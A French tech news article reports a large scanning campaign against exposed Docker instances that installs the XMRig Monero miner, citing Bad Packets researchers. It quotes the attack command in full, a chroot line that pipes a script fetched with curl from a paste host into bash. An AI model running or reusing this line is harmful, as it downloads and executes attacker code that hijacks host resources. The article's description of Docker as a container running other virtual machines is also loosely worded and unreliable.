fbpx
ActualitésHackingHigh TechSécurité

Les hackers recherchent la vulnérabilité de Docker

Sa taille est ce qui a attiré l'attention des chercheurs

Un groupe de piratage aurait effectué une analyse en masse d’Internet à la recherche de ports vulnérables sur des systèmes utilisant le logiciel d’entreprise Sandbox Docker pour exploiter la crypto-monnaie.

Selon les chercheurs en sécurité de Bad Packets, les analyses, qui ont débuté ce week-end, identifient des vulnérabilités permettant aux mauvais acteurs d’injecter du code malveillant qui déploie un mineur de crypto-monnaie sur les instances Docker d’une entreprise, rapporte ZDNet.

Troy Mursch, chercheur en chef et cofondateur de Bad Packets, a déclaré à ZDNet que ce type d’activité était assez courant. Cependant, cette campagne était unique en raison de sa taille.

Les chercheurs doivent encore se familiariser avec l’ensemble de la campagne. Cependant, en l’état actuel, l’attaque analyse plus de 59 000 réseaux IP à la recherche d’instances Docker vulnérables.

Lorsqu’une instance exposée est trouvée, la ligne de code ci-dessous est exécutée.

chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;

Cela télécharge un autre script à partir du serveur de l’attaquant, qui installe ensuite un robot minier de crypto-monnaie, Monero miner XMRig.

Au cours des quelques jours écoulés depuis que les pirates ont commencé à analyser les instances Docker exposées, plus de 14,8 millions de Monero ont été minés, pour une valeur d’environ 740 dollars, a ajouté Mursch.

Un petit coup sur Docker

Si vous n’êtes pas dans le logiciel d’entreprise, vous ne savez peut-être pas ce qu’est Docker, mais l’un des développeurs de Monde Informatique me l’a expliqué comme un «conteneur virtuel» dans lequel vous pouvez exécuter d’autres machines virtuelles.

Docker lui-même n’est pas une machine virtuelle, c’est un environnement sandbox et nécessite certaines ressources de la machine hôte pour fonctionner correctement.

Il permet aux applications de package de devs et de les exécuter dans des environnements virtuels.

Vous pouvez lire cet explicatif pour plus d’informations.

Afficher plus

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Bouton retour en haut de la page